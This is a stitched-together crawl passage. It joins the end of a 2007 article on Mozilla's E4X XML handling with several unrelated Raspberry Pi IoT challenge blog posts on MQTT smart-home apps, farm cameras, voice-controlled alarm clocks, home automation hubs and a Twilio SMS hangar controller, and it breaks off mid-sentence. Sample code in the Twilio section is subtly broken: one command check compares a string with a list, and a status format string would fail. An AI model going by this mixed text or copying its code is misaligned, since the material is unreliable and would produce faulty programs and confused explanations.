populate() function using an XMLHttpRequest call. The goal here is to minimize the amount of processing of the feed as a DOM, so here that process is handled by using the http.responseText method to get the feed as text. The Mozilla E4X implementation has a few serious limitations, one of the biggest of which is its inability to parse XML declarations that start with <? and end with ?>. Thus, it is necessary to run a quick regular expression to remove all of these: var data = data.replace(/<\?(.*?)\?>/g,"") Namespaces in E4X are something of a headache, for much the same reason that they are a headache in XML in general. However, it is possible to change the default namespace and work within the context of that namespace without needing to create a formal namespace declaration or use prefixes. In order to retrieve the feeds from the relevant returned document (which includes various HTTP request and response headers as part of the package), the default namespace was set to Atom as "": default xml namespace=""; var feed = new XML(data); Once so declared, it becomes possible to switch back and forth between then Atom namespace and the XHTML namespace, jumping from reading data appropriate to each entry to making new option elements for that entry: for each (entry in feed..entry){ default xml namespace=""; var title = entry.title.toString(); var id = entry.id; default xml namespace=""; var option = <option value={id}>Introducing E4X</option>.toXMLString(); selectNode.innerHTML += option; } Note the use of the toString() and toXMLString() methods. E4X exposes a limited set of methods on E4X XML() and XMLList() objects (you don't have the same ability to assign methods to E4X objects that you do with ordinary objects for this reason). A reference such as entry.title actually returns an XML node; if this is used as part of a string expression then the JavaScript engine will automatically recast the node to its text value, but sometimes it is better to make this explicit via the toString() method (you could also do ""+entry.title to do the casting, but that operation isn't always obvious when looking at code). Similarly, the toXMLString() method will serialize an XML() node as XML content, while applying toXMLString() to an XMLList() object will return a serialized collection of nodes. The mapping to the default namespace prior to the option will set the namespace to the namespace of the containing object, which in this case is the <select> node, if passed to the innerHTML property. One of the more useful aspects of JavaScript as a language is the use of closures, in which variables that are defined at one point, then used within a function defined in the context of those variables, will continue to hold the values previously assigned so long as the function remains in scope. This is used to good effect in the internally defined selectFeed() function. The feed is referenced within the function, as well as displayNode and linkNode, which defines the display area for a selected entry's content and a button for launching the original page in a second window. One interesting consequence of this is that because the selectFeed() function is then assigned at that point to the selection box listing the titles, the feed itself remains in memory, but is completely inaccessible to anything beyond the selectFeed() function. Admittedly, in this case it doesn't make that much difference (determining the feed is relatively simple), but from a security standpoint this provides a layer of protection on potentially sensitive information.); I wanted to include the link to the source not only because it's a logical piece of a feed viewer, but because it's useful to illustrate an attribute filter in E4X. In Atom, a given entry may have more than one link associated with that entry. The rel="alternate" link is typically the one that contains a reference to the relevant web page that the resource came from initially (and as such there is always only one such alternate link). The expression entry.link.(@rel=='alternate').@href thus retrieves from the link collection the link for which the @rel (relationship) tag is set to "alternate". The expression within the parentheses here is (more or less) JavaScript; the @rel retrieves the rel attribute relative to the link collection and compares it to the string 'alternate' (note the double equal signs). This is a filter, just as var entry = feed..entry.(id==selectNode.value); in the previous line is a filter. A screenshot of the "app" is shown in Figure 1. Figure 1. Metaweb Screenshot At the end of this method you have the expression linkNode.setAttribute("href",link). This is a DOM statement, because linkNode is a DOM element, not an E4X element. At this stage, while one of the main goals of the E4X process was to create a simpler, more efficient way of working with document objects, this has not been realized in any significant way. By the way, it is possible to convert an E4X object into a DOM tree and vice versa, though these are comparatively expensive operations. The function eNode2dNode performs the conversion one way, converting an E4X object into the root node of its own DOM-based document, while dNode2eNode makes the conversion in the other direction: var eNode2dNode = function(eNode){ var str = eNode.toXMLString(); var doc = (new DOMParser()).parseFromString(str,"text/xml"); return doc.documentElement.cloneNode(true); } var dNode2eNode = function(dNode){ var str = (new XMLSerializer()).serializeToString(dNode); var eNode = new XML(str); return eNode; } E4X and JSON It is not my wish to deprecate the importance or value of JSON in this article (well, not much anyway). JSON represents a minimally sufficient platform for information interchange within most browsers, and as such realistically will be around for quite some time (especially as Microsoft's Internet Explorer does not look like it will be adopting the most recent JavaScript changes any time soon). However, it's worth noting that a lightweight XML protocol, LINQ, likely will be migrating to IE with its next release. While differing somewhat in syntax from E4X (and having a considerably broader role), LINQ will most likely be doing much the same duty in IE that E4X does in Firefox and Flash—providing a way of using XML easily and cleanly without having to use the rather cumbersome mechanism of DOM. Given the increasing dominance of XML as a messaging and transport protocol on the server and between server and client, the use of LINQ does open up the notion that you can take advantage of the rich characteristics that XML has to offer without having to complexify your code with DOM manipulation. At a minimum, if you are specifically targeting the frameworks where E4X is supported, you should take some time to investigate the technology, especially when dealing with the increasingly syndicated nature of web technologies. Combining E4X and Atom, for instance, opens up all kinds of interesting potential usages, especially given the increasing role that Atom is playing as a data transport protocol for companies such as Google. While it is possible that you'll see more companies exposing JSON services, I personally see XML-based Atom services growing far faster, and in that case the use of a native XML datatype just cannot be beat. Kurt Cagle is an author, research analyst with Burton Group, technology evangelist, information architect, and software developer specializing in web technologies. He is the webmaster for XForms.org. He lives in Victoria, British Columbia, where he's working on the open source x2o data server.
http://www.xml.com/pub/a/2007/11/28/introducing-e4x.html
CC-MAIN-2017-17
refinedweb
2,967
50.97
This is an index page providing links to every post created as part of the Pi IoT Design Challenge for the Alarm Clock / Control Unit project. Enjoy! This PiIot Challenge evolved in a very strange mode for me; as much the project was growing as much a new scenario was emerging imposing as the main track. So what happened? I had to make a choice: close the challenge just in time or smoothly follow the project evolution. There was not time to do both. Closing the challenge by the deadline would require a series of simplifications in the project. Then the remaining time for the next - and, why not? More ambitious - deadline was too few for refactoring the idea and prototype to the next target. I have done the choice: the challenge deadline become just the most important part of a wider project focusing to a more complex design. It was clear to me that it was a necessary choice seeing the first media coverage and - most of all - the interest and support from the other partner, the MuZIEum where the project will take place, the same Element14 supporting and encouraging me, the approach of the GearBest.com second sponsor and the first interview that are under publishing next weeks. The new timeline necessarily changed the project approach. This perfect reading place, become focused on the Internet of Things technologies supporting visually-impaired users: it will be a really reading, chatting, discussing and interacting area place to be installed in the MuZIEum site. Many new aspects to take care made things more complex but also more interesting. The design idea becomes a use case adding one more complexity level: usage, color choices, networking, usability, and more. The points below focus the main aspects: During this period a series of video-podcasts with Periscope are planned for streaming on Twitter about project advance news, interviews to the staff members and more. The project updates will continue as usual by the next 5 September. I hope that element14Dave, spannerspencer and the resto of Element14 challenge sponsor will appreciate the scenario. And I also hope that the users continue following the project development status.: Most of the code is available on GitHub. Even though technically both nodes are working, they are to simplistic! I want something to actually be used in the house and even appealing to my roommates. Which means that: Always key in a smart house, and yet, I left it for the very end... till it was too late That's been all for now Greetings! Caterina Lazaro Last day (+ 1) of Pi IoT competition, and a Smart Competition Home is ready to run In this post, I wanted to show how the system looks like: both in paper and in the house itself. So here comes the pictures: ELEMENTS/NODES: PUBLIC DOMAIN I want to show where each node is being working in real life. Installation is a very kind work to use in this case, as each node has been location in a best-effort basis (but it works!) Attached to the back door in the Kitchen In the corner of the living room. Accessible and not in the way. The User's Node is intended to be each of our smartphones However, I also had an old Tablet which was only used to control Netflix in a the home Chromecast. Well... it is now a general User's Node to read the smart house information. This new post finalized the User Node (an Android device). It will include the smart-house functionalities to that of the competition system. This way, any resident will be able to check the smart house information while connected to the WiFi and switch to Competition mode when leaving to gain some miles. *In other words... I will make the Smart Competition button work NOT CONNECTED EXAMPLES OF SUBSCRIBE RESPONSE Initial setup: Nexus 5 / Android / SmartCompetitionHome App v 3 It is a direct implementation of the MQTT Clients, thanks to the Paho library I create both kind of clients in the app. To do so, the code needs: Both types of client (subscriber, with its callbacks and publisher) are implemented in the Paho libraries. Very great news public static void createMQTTDefaultClients(){ String url = protocol + broker + ":" + port; clientId = "phone_"+action; try { //Publisher: //Create an instance of this class sampleClient = new MyCustomMqttClient(url, clientId, cleanSession, quietMode,userName,password); // Perform the requested action sampleClient.publish(pubTopic,qos,message.getBytes()); //Subscriber: //For the async clientId = "phone_"+action_async; sampleSubscriber = new SampleAsyncCallBack(url,clientId,cleanSession, quietMode,userName,password); sampleSubscriber.subscribe(subTopic,qos); } catch(Throwable me) { // Display full details of any exception that occurs System.out.println("reason "+((MqttException) me).getReasonCode()); System.out.println("msg "+me.getMessage()); System.out.println("loc "+me.getLocalizedMessage()); System.out.println("cause "+me.getCause()); System.out.println("excep "+me); me.printStackTrace(); } } In order to create the subscriber, I instantiate the class SampleAsyncCallback (implementing MqttCallback). The subscription will be performed as a combination of the function subscribe() method (which starts and manages the process)and the waitForStateChange(). As a result, the code will navigate through all the connection steps: While the client is subscribed, the information will get to the phone as a callback, messageArrived(). This method is used to: More details of this callback: /** * @see MqttCallback#messageArrived(String, MqttMessage) */ public void messageArrived(String topic, MqttMessage message) throws MqttException { // Called when a message arrives from the server that matches any // subscription made by the client String time = new Timestamp(System.currentTimeMillis()).toString(); System.out.println("Time:\t" +time + " Topic:\t" + topic + " Message:\t" + new String(message.getPayload()) + " QoS:\t" + message.getQos()); if (topic.equals("sensors/door")){ //Change door values //MainActivity.doorState.setText(new String(message.getPayload())); SmartHomeActivity.readDoor = new String (message.getPayload()); receivedDoor = true; }else if (topic.equals("sensors/temperature")){ //Change temperature values //MainActivity.tempState.setText(new String(message.getPayload())); SmartHomeActivity.readTemp = new String (message.getPayload()); receivedTemp = true; }else if (topic.equals("sensors/pressure")){ //Change pressure values //MainActivity.pressState.setText(new String(message.getPayload())); SmartHomeActivity.readPress = new String (message.getPayload()); receivedPres = true; }else if (topic.equals("sensors/warning")){ //Change warning //MainActivity.warningState.setText(new String(message.getPayload())); SmartHomeActivity.readWarning = new String (message.getPayload()); receivedWar = true; }else if (topic.equals("sensors/altitude")){ SmartHomeActivity.readAlt = new String (message.getPayload()); }else{ //Change anything SmartHomeActivity.readTemp = ("?"); SmartHomeActivity.readWarning = ("?"); SmartHomeActivity.readDoor = ("?"); SmartHomeActivity.readPress = ("?"); } if (receivedDoor && receivedTemp && receivedPres ){ receivedDoor = false; receivedTemp = false; receivedPres = false; receivedWar = false; //Go to the next step of the connection SmartHomeActivity.subscribed = false; } } At this point, I use the subscribe() function when pressing SUBSCRIBE button. I have been using it mainly for debugging purposes: I can check whether messages are received by the broker when the sensor data seems to be lagging. NOTE: Clients id! Along this project, I have been creating a few different clients. It might be obvious, but sometimes it is not... I have been given them different ids. The broker will refuse any connection if there is already a client with that name I wanted to refined this Smart home activity, since its missing both a nicer look and additional useful commands. Regarding this commands, I wan to point out that: All in all... it will get the job done but it is still not the most comfortable to deal with This post closes the implementation of our User's Node. Now, we have the two main functions of the system: In order to have a bit more of feedback and add some thrilling while running ("wait! when did he run all those miles?? no way I will let this be"), I want to have an updated table of the current's month competition state. That means: Existing file: insert_into_table.php New functionality: Obtain last row of each column So, apart from inserting information to the database, the competition service should be able to: The main .php file is now able to read different types of messages. As a result, we differentiate: This request , the get_row, also contains the names of all the roommates, which will be use to select single tables. Then, the file will 1. Once we obtain the value from the right HTTP_POST ($json), the code extracts the roommates requested. Each roommate = table 2. Fetch last row of each of user's table 3. Extract monthly distance //Decode JSON Into Array $data = json_decode($json); foreach($json as $key=>$val){ $row_last = $db->read_rows($val); $month = $row_last[NUM_MONTH_COLUMN]; } (*) read_rows function is been developed to contains the corresponding SQL calls to obtain the last row, and fetch it as an array to return 4. At the end, Send it back to the requester, User's Node Initial setup: Nexus 5 / Android / SmartCompetitionHome App v 2 In this section, I explain how the PodiumTableActivity.java is implemented. It will request the current state of the competition from the server and display in a table. Again, results will be organized from top to bottom. This Activity will only display a table (and later on, a REFRESH button). When the Activity is created, it will request the monthly information for each user from the Central Node. Once the response arrives, the table is updated with the most recent data. The interesting part of this file is the new AsyncHttpResponseHandler which handles successful messages as follows: //Handle succesful response public void onSuccess(String response) { System.out.println("Get comp Server response: "+response); try { //Convert to a JSON Array and get the arguments JSONArray arr = new JSONArray(response); //List<String> args = new ArrayList(); //Analyze each JSON object JSONObject jsonObj = (JSONObject)arr.get(0); Iterator<?> keys = jsonObj.keys(); while( keys.hasNext() ) { String key = (String) keys.next(); lastMonthValues.put(key, jsonObj.getString(key)); } //Update gui values: updateTableValues(); } catch (JSONException e) { e.printStackTrace(); } } (*)lastMonthValues is a Map<String, String > structure holding each roommates monthly distance. updateTableValues() we use this information to organize the Podium table. NOTE: There should be a way of reducing that long delay when retrieving data The competition android application is completed! With this version, each user can: This post describes the last step to have a functional competition system. It will show how to update the python GUI of the central node with the data stored in the database (coming from each of the roommates phones, as explained in the previous post). It is a short entry describing: All development is done in the central node (Raspberry Pi 3), using Python and SQL queries. It will be hosting two kind of tables: Most of the information will be stored from the Compatition service, as explained in [Pi IoT] Smart Competition Home #8: Competition system III - Android Competition application: communicating with the server (Each roomates distance information). Then, the Python main program will retrieve that information and display the competition in its main GUI. It will also determine who is the monthly winner at the end of each period. Nevertheless, the main python activity will be the one handling the winners table. Once we change to a new month, it will use the last monthly_distance value of each resident to selectand store that past month winner. Both Competition Service and Main program access the database with an specific user and password. Since it is not very advisable to use the very same root, I will show how to: Let's begin... On a command prompt of the central node, we start mysql service as a root user A step 0, create the database to use: > CREATE DATABASE Competitiondb; And start suing it (~open) > USE Competitiondb; To create a newlocal user, we input the following SQL command: >CREATE USER 'userName'@'localhost' IDENTIFIED BY 'password'; To grant permissions (in my case SELECT, DELETE, CREATE, DROP {table}, INSERT, UPDATE {into table}) > GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP ON Competitiondb.* TO 'userName'@'localhost'; To test this user, I will create a new mock table and then erase it. We will see the number of tables with SHOW TABLES command (none at this point) Here is the screenshot: We keep 'userName' and 'password' information to be used in any code accessing the database Initial setup: Raspberry Pi 3 - Raspbian SO (Jessie) / SSH Enabled / Mosquitto MQTT Broker installed / MQTT Subsciber client / Console interface / Python GTK interface / MySQL Server / Apache2 web Server / Competition Service version 1 The GUI is already prepared to host the current competition table (showing each residents progress, and having them organized with the best on top). More details on how it was done, can be found in[PiIoT] Smart Competition Home #5: Central Node Upgrade (*) last version of the Central Node Code New File - read_db.py Existing file - main_gui.py read_db.py performs has only one function, read_last_sample(table), performing two main actions: def read_last_sample(table_name): db = MySQLdb.connect(host="this_host", # your host, usually localhost user="userName", # your username passwd="one_password", # your password db="CompetitionDB") # name of the data base # Cursor to db cur = db.cursor() # Select table cur.execute("SELECT * FROM "+str(table_name)) # Return last row all_rows = cur.fetchall() for row in all_rows: print row[0] last_row = cur.fetchlast() db.close() return last_row The main_gui.py will call the function read_last_sample(table) every time a gui label is updated. It will refresh the last values for each of the roommates New File - write_db.py Existing file - main_gui.py In this case, the main_gui will detect when a new month starts, and select the best resident during the previous one. It will be stored in winners table, using the file write_db.py (very similar to read_db.py, though it executes an INSERT query) (What a coincidence... I am winning ) For the first time, I can say we have a "Smart Competition House" (yet, very basic one). In the house central node, there will be displayed: The platform is lacking a lot of interactivity though (we can not see the competition state in the phone, and there is no current interface for the smart house either ) Going through my previous blog entries I realized I had not provided the followup information for my Farm Operations Center Box that I had previously said I would. So here it is! :-) As I had mentioned before the medium sized box worked perfectly as a container for the 7 inch touchscreen with Pi3 attached. As you can see here, the 4 squares line up perfectly with the metal frame of the touchscreen. Making for an easy mounting of the F.O.C. to the plastic container. Here we have the view of Camera 2 moved over to monitor the Duck Domain. With an easy swipe of a finger up or down I can look at any of the camera feeds! From my top picture above you can see there is a good amount of space available to mount additional items including but not limited to batteries. I had came across a very interesting sounding battery option with pass through capabilities advertised at Best Buy that I wanted to try. Of course when I arrived there to purchase it there was none to be found. Online it listed 3 in inventory, even the stores internal inventory listed 1, but after an hour of waiting and searching through Best Buy I ended up heading over to Walmart again to pick up a small usb battery. Sadly the idea of pass through charging only seems of interest to those with cell phones. Trying to explain to various techs what exactly I needed in a battery led to a lot of confused looks and nothing that helped me for this project. You would think the idea of having a power source that can charge your phone/tablet/micro usb item while also charging the battery would be a great thing to have. Why bring a charger and a battery if you battery can also charge your device while charging itself? Obviously a pass through battery would be quite nice to add into the F.O.C. box so I could just quickly pull the cord and head out to check things without having to power down and restart with the battery. I did end up picking up a basic 4400 mah battery with the idea of testing, but while I was assured it had a 2.1 amp output the RPi3 with 7 inch screen was not impressed with its actual power providing and refused to work with just that battery. So caveat to others, keep your receipts and packaging. Once I do find a pass through battery that works for my setup I will share out to Element 14. There seems to be Irony that my blog #13 comes with bad news. I was unable to get my Enocean Pi to work with 3 different Raspberry Pis. Leading me to wonder if I have a bad Hat. :-( I worked for days on getting it to link with my Raspberry Pi3 that is running my Farm Operations Center but it would never show as recognized. Looking at other comments there seems to be a problem with Raspberry Pi 3 and this currently so I pulled out 2 different Raspberry Pi 2s to see if that would help. Regardless of the Pi platform the Enocean Pi could not be seen. There are some very interesting writeups on installing Enocean Pi and they were quite helpful in trying to troubleshoot what was happening but no success. My desire to use the Sensors are still very high and I am considering ordering another Enocean Pi and another set of sensors since once it works I can see adding more inputs easily. The Reed sensor is what I want to tie into my sliding Fowl doors and allow for me to trigger when it is open. Energy harvesting and radio communications, a huge plus! I had ordered a float sensor and was looking forward to seeing if I could tie into the Temperature card since data on it showed inputs that might be of use. Of course having current Temperature around animals is always a plus. The Float sensor is to be installed into this Watering system. The bottom bowl has a float controlled water input. The 5 gallon bucket would be where the float sensor would reside to alert when the water was low. As you can see below the bucket, I have planned ahead by putting a T. The capped part of the T will be routed over to my Rabbit Cages to allow each rabbit to have it's own individual water source via the Chicken Nipples I have previously shown. The blue bowl will be for my G.O.A.Ts. Depending on how quickly the water is went through I may tie in another 5 gallon bucket as well. But that requires future monitoring. Here is the one complete Rabbit cage. You can see the individual pvc feeder tubes I have in place. I want to do similar for the water but have them all tied into the bucket system shown above. On the left hand side you can see the Baby Box with Momma Rabbit perched on top of the box. I am sad that this part of my plans did not work through and look forward to seeing if I can get another Enocean Pi to fully implement the whole plan of the IoT Farm! First off I want to thank Element 14 and all of the incredible participants of this design challenge! It was an experience I greatly enjoyed and want to continue to expand upon! The other participants had brilliant ideas and implementations and constantly made me wonder how I could further tweak and improve my own project. Plus input from several actually helped me redirect some of my efforts over to a water source monitoring system. I am very pleased with how the Farm Eyes and the Farm Operations Center worked together to allow me access to monitor my current areas of observation. I definitely look forward into implementing the sensors part of the project and hope that a new Hat will allow for that to work. I will of course blog of this to share to Element 14! My family and I thank Element 14 for giving me the chance to work my ideas in reality. Please keep watching to see how it improves and feel free to make suggestions based on your experiences or thoughts! The [Pi IoT] Thuis #9: Status Update and will give you the latest status of all the projects and use cases. These are the projects I made available as open source on my GitHub account during this challenge (or will make available later). They are all set up, so that they can be reused by others in their own home automation projects. As described in [Pi IoT] Thuis #7: [Pi IoT] Thuis #5: Cooking up the nodes – Thuis Cookbook you can also find something new for yourself. In [Pi IoT] Thuis #14: Home Theater part 1: CEC I made some small updates as I installed the node connected to the home theatre system by HDMI. Plex doesn't allow me to add a plugin directly in the server, but there is an API and WebSockets for status messages. The API and WebSockets are implemented, as is described in [Pi IoT] Thuis #16: Home Theater part 3: Plex. It is mostly implemented as Java library with a similar set up as I'm using for integrating Java and MQTT. As I have to clean up the project, it will be published at a later stage. To-do: [Pi IoT] Thuis #14: Home Theater part 1: CEC. In [Pi IoT] Thuis #10: [Pi IoT] Thuis #16: Home Theater part 3: Plex. To-do: Sensors are placed in both the kitchen and the entrance room. The Core knows about them and as described in [Pi IoT] Thuis #8: Core v2: A Java EE application rules are defined to turn the lights in those rooms on and off depending on movement and time. This works pretty well already! To-do: The iBeacons are placed at several locations in the house, providing a good coverage to detect if you're arriving home. When you arrive home a notification is sent, which allows you to directly start up the home theatre system. You can read about this in [Pi IoT] Thuis #13: Presence monitoring using iBeacons. [Pi IoT] Thuis #15: Home Theater part 2: controls. The Ambilight will be finished at a later stage. To-do: The app is running and fully functional, as you can see in [Pi IoT] Thuis #11:: Most lights can already be switched manually using the buttons on the walls. Some of them should however be switched using the secondary button, which does a scene activation. I still have to add support for this to the Zway-MQTT. To-do: For energy monitoring I only did some research. InfluxDB seems to be a good candidate for storing the data. Unfortunately I wasn't able to work on this use case during the challenge, but I'll come back to this in a later stage. Todo: I already mentioned some future plans, a few of those I want to highlight.! I enjoyed reading the blogs of the other challengers as well, great to see so much great ideas! Thanks again to element14 for selecting me as a sponsored challenge and for giving me the inspiration and motivation to work on Thuis! A lot of online sources were used in order to achieve the creation of my project. Though the sources have been linked in the relevant posts, I have summarised the complete list per subject right here for your convenience. It's been a tough, stressful, but certainly fun three months competing in this challenge. As if the challenge itself wasn't challenging enough, I also moved house halfway the challenge. Though the move was more time consuming than originally anticipated, I managed to complete most of the objectives I had set originally. This is my final post for element14's Pi IoT Design Challenge, summarising and demonstrating my project builds. Following features were implemented, making several rooms smarter: Unfortunately I couldn't crack the code of my domotics installation yet, but help seems to be on the way. To accommodate all of the above mentioned features, five different devices were created: The energy monitoring device makes use of an open source add-on board for the Raspberry Pi, called emonPi. Using clamps, it is able to measure the current passing through a conductor and convert it in power consumption. I combined the emonPi with a Raspberry Pi Zero and two currents clamps: one to measure the power consumption of the shed, the other for the lab. This can of course be applied to any room, as long as the clamp is attached to the proper conductor. Want to know more about emonPi?: Two IP cameras were installed for live monitoring: one in the lab, and one in the shed. Both make use of the Raspberry Pi Zero v1.3 with camera port. The video stream is converted to MPJEP and embedded in OpenHAB in the matching view. A mini build which was not originally foreseen, but which I thought would fit nicely in this challenge. The concept is simple: four connectors are foreseen to which keys can be attached. When a key is attached, a GPIO pin changes status, reporting the change to the control unit. A future improvement could be to either use a different connector per key, or make use of different resistors and an ADC to know which key is inserted where. The full project is described in a dedicated blog post: The idea of the smart, voice-controlled alarm clock started in 2014. The result was a functional prototype, but too slow and bulky to be really useful. This challenge was the perfect opportunity to revisit this project, and I'm quite happy with the way it turned out! Here's a side-by-side comparison: The original Raspberry Pi 1 B with Wolfson audio card has been replaced by the new Raspberry Pi 3 B with USB microphone and I2S audio module. The difference in performance is incredible. The result is a near real-time, voice controlled device capable of verifying sensor status, fetching internet data such as weather information or even playing music. Most of the work was done for this device, and simply reused by the others. The posts cover voice control, setting up OpenHAB, controlling displays, and much more: The Control Unit has the same guts as the alarm clock: I2S audio, USB microphone, speaker, Raspberry Pi 3, etc ... It does however add a keypad and touch screen, allowing control via touch on top of voice. The keypad switches between different webpages on the touch screen, which is locked in kiosk mode. The touch screen can be used to trigger actions, visualise historic data (power consumption, temperature), consult the weather, etc ... You can find the relevant posts below: Various demonstrations were already made over the course of the challenge. But as this is a summary post, I've created a video showcasing the entirety of the project. Hope you like it! Because this project wouldn't have been possible without the plethora of online content and tutorials allowing me to combine and modify functionality to give it my own twist, I am publishing all the code created as part of this challenge in a dedicated GitHub repository. You can find it here: The repository contains the Python scripts, Puppet modules and diagrams, all categorised in a way I thought would make sense. I will make sure the repository is updated as soon as possible! I'd like to thank element14, Duratool, EnOcean and Raspberry Pi Foundation for organising and sponsoring another great challenge. It's been a wild ride, thank you! I would also like to thank element14Dave, fellow challengers and members for their input and feedback over the course of the challenge. Finally, a big thank you to my wife and kids for allowing me to participate and even help me do the demonstrations! Time for some rest now, and who knows, perhaps we'll meet again in a future challenge. Here is quick project summary of the Pi3 Control Hub project created for the Pi IoT Design Challenge - Smarter Spaces with Raspberry Pi 3. The idea here was to create a Hub and spoke network of Raspberry Pi's with the Pi 3 as the Hub , which had Home- Assistant installed on it, which is a powerful open- source home automation platform. And a few other versions of the Pi used as the spokes , that is Here is a video demo, of some of the features implemented as part of the project As part of the Hub , here are few features I plan on use on a day to day basis - Controlling the Hue Light bulbs using the Home-Assistant - Check weather conditions on the Sense Hat before leaving for work in Morning - Use the Pi Camera connected to the Hub to Monitor stuff , like a print job running on my 3D printer, by opening Home-Assistant on a tablet - Checking the outside temperature and comparing it to the temperature from the Yahoo weather API, this will be handy in the winter. - Checking on the picture gallery of the intruder detected, basically checking if I was able to catch some raccoons in action. - Checking if my Aunt/Mother visited me when i was away,given that they both have a spare key. Here the EnOcean magnetic contact switch connected to door will log an entry in Home-Assistant History, which I can come an check on in the evening. Here are the links to the various blogs, with a brief description Spoke 1 - Security Camera (in the image above you see the EnOcean temperature sensor attached which is used send the outside temperature to the Hub aka home assistant on Pi 3 via MQTT) As part of this spoke a Raspberry Pi Zero with a camera connector was used with a Pi Noir camera V2 was used and we setup motion for intruder detection. Pi Control Hub: Spoke 1 :Security Camera - setting up Motion to stream video Using the Single File PHP gallery we create a gallery of pictures that you can access from the Pi Zero, via a web browser on you laptop Pi Control Hub: Spoke 1 :Security Camera (continued)- Photo gallery of the intruders And, also designed and 3D printed STL files for an enclosure, which kind-off looks like a security camera , you can find the STL files at Pi Control Hub: Spoke 1 :Security Camera -- STL files to 3D print Spoke 2 - Blinds Automation This was the most interesting and challenging spoke that was put together, considering this was the first time I was using the EnOcean Sensor kit and module, which meant I ran some basic test using FHEM and tried blink a few LEDs when the EnOcean push button was pressed + Temperature module detected temperature + Magnetic contact was Open/Closed , which were all connected to Raspberry Pi B+ via the EnOcean module. Pi Control Hub:Spoke 2:Blinds Automation-- Setting up EnOcean Sensor and Blinking LEDs To open and close the blinds the plan was to use a gear motor which was driven by the Sparkfun motor driver , when a EnOcean push button was clicked Pi Control Hub:Spoke2:Blinds Automation(continued)--Driving Motor with EnOcean PushButton Lastly we 3D printed an enclose for the Pi B+ and EnOcean module and a mount for the gear motor , the STL files can be found at Pi Control Hub:Spoke2:Blinds Automation(continued)-3D Printing Holder and Motor mount Blinds Automation using Raspberry Pi and EnOcean Sensor Kit Spoke 3 - Key-Less Door Entry As part of this spoke a Pi A+ was used with a servo motor. In addition, a python-flask application was written which was hosted on the Pi A+ connect to my home Wifi. This App will be used to unlock the back door using a secret password which was setup in the code. Pi Control Hub:Spoke3: Key-less Door entry-testing the Servo The challenge with this spoke was to design the files to 3D print to find the door knob and the servo mount, if you plan to replicate this you can find the STL files at Pi Control Hub:Spoke3: Keyless Door entry STLs Key-less Door Entry using the Raspberry Pi HUB For the Hub as mentioned above Home-Assistant was installed on the Raspberry Pi 3, and as part of the first blog we set a lot of sensors that included - Weather from the Yahoo API - Bandwidth speed test -Monitoring your favorite twitch channels -Getting today's value of BitCoin -Getting the Pi 3 CPU usage and Disk space usage In addition we also setup the Phillips Hue bridge and setup an automation rule to switch on the light when you are at home, using the bluetooth of the your phone. Pi Control Hub: Setting up Home Assistant+Controlling Philips hue Home Assistant setup on Raspberry Pi3 - testing Philips Hue bulbs Now, no home automation project is complete with out music , which meant the setup of Mopidy with a couple of speakers and Adafruit s Stereo 3.7W Class D Audio Amplifier, for the circuit and commands check out Pi Control Hub: Music with Mopidy and Home Assistant Mopidy setup with and Home Assistant on a Raspberry Pi 3 The next blog shows how to setup the Pi Camera V2 in Home Assistant to stream video, and also integrate the feed from the security camera spoke Pi Control Hub: Integrating Camera's in Home Assistant Now to develop the case to fit all electronic components, a mix of 3D printing and basic wood working with a Dremel was used and we also installed Chromium on raspbian-jessie And as part of the final blog we integrated the EnOcean Temperature Sensor and the Magnetic contact sensor which mimics the door opening and closing in Home-Assistant , by installing mosquitto MQTT broker on the Pi 3 and installed MQTT client on the Pi B+ which is connected with the EnOcean module. Pi Control Hub : Getting EnOcean Sensor data to Hub via MQTT .) [Pi IoT] Plant Health Camera #1 - Application [Pi IoT] Plant Health Camera #2 - Unboxing [Pi IoT] Plant Health Camera #3 - First steps [Pi IoT] Plant Health Camera #4 - Putting the parts together [Pi IoT] Plant Health Camera #5 - OpenCV [Pi IoT] Plant Health Camera #6 - Putting the slave Pi to work [Pi IoT] Plant Health Camera #7 - Synchronizing the cameras [Pi IoT] Plant Health Camera #8 - Aligning the images [Pi IoT] Plant Health Camera #9 - calculating BNDVI and GNDVI [Pi IoT] Plant Health Camera #10 - connecting the Master and Slave Pi [Pi IoT] Plant Health Camera #11 - Finalization Also a nice intermediate summary made by Charles Gantt: Design Challenge Project Summary #23: Plant Health Camera **Final Update** I hope you all enjoyed the project, I'm open for any questions and comments. Best regards, Gerrit. It's been a fun project and I hope that you were able to glean some useful tidbits to use in your own projects. Here are a couple of pictures of the HangarControl master hub and then the first many remote heater controls. Now that the web interface is up and running (), it is time to add the final piece: Operating the hangars via text messaging! I'm going to use Twilio () to provide a link between the SMS or text messaging world and the web-based internet world. Twilio provides a plethora of tutorials and help as well as a free phone number for your development projects. Once you have signed up and have your phone number and API credentials, come on back and follow along. It seems that everyone has a sample application that shows how easy their product works, but when you try integrating it into your own project, it all falls apart. I am going to show you how HangarControl implemented text-messaging so you can see Twilio in a larger context. I have attached the application so that you can download and view in its entirety. # Use Flask for our "web" interface. In this case "web" is going to return XML rather than HTML. import flask # Twilio provides libraries for most of the popular languages. from twilio import twiml app = flask.Flask(__name__) I'm using my Twilio credentials as set in environment variables so that they don't get published! Either in your login script, most likely .bashrc, or possibly FASTCGI init script, set a couple of environment variables that your programs will read upon execution. This allows you to share code such as this without giving away your private information. If you're never going to show someone else then you can just replace the following with variable assignments like: app.config['account_sid'] = "your SID goes here" import os app.config['account_sid'] = os.getenv('ACCOUNT_SID', '<SID provided by Twilio>') app.config['auth_token'] = os.getenv('AUTH_TOKEN', '<Secret auth toke provided by Twilio>') # We only have a single endpoint and will parse the string sent by Twilio to determine user intent @app.route('/', methods=['GET', 'POST']) def incoming_sms(): attr = None message = flask.request.values.get('Body', '"?"') message = message[1:len(message) - 1] ary = message.split(" ") cmd = ary[0] if len(ary) > 1: attr = ary[1] if cmd in ["heat","preheat"]: rtn = preheat(attr) elif cmd == ["cancel","off"]: rtn = stop(attr) elif cmd in ["list","status"]: rtn = status(attr) else: rtn = "Ask one of 'heat <hangar>', 'stop <hangar>', 'status', '?'" r = twiml.Response() r.message('HangarControl "{1}" {2}\n{0}'.format(rtn,message,cmd==u"preheat")) return flask.Response(str(r), mimetype='text/xml') Once we have pulled apart the command and any parameters from the Twilio SMS message, the program will be dispatched to one of the following methods. I intentionally used these barebones methods to demonstrate what you would need for your own project. I will followup with actual code, but didn't want to overly complicate this presentation. Each method performs the requested action and then returns a string that will be packaged up and returned via text message to the pilot. def preheat(hangar=None): return "Preheating {0}".format(hangar) def stop(hangar=None): return "Turn off heater in hangar {0}".format(hangar) def status(attr=None): return "Status {attr}".format(attr) Believe it or not, that's all you need to do to implement text messages into your applications. I'd heartily recommend adding SMS capabilites to your 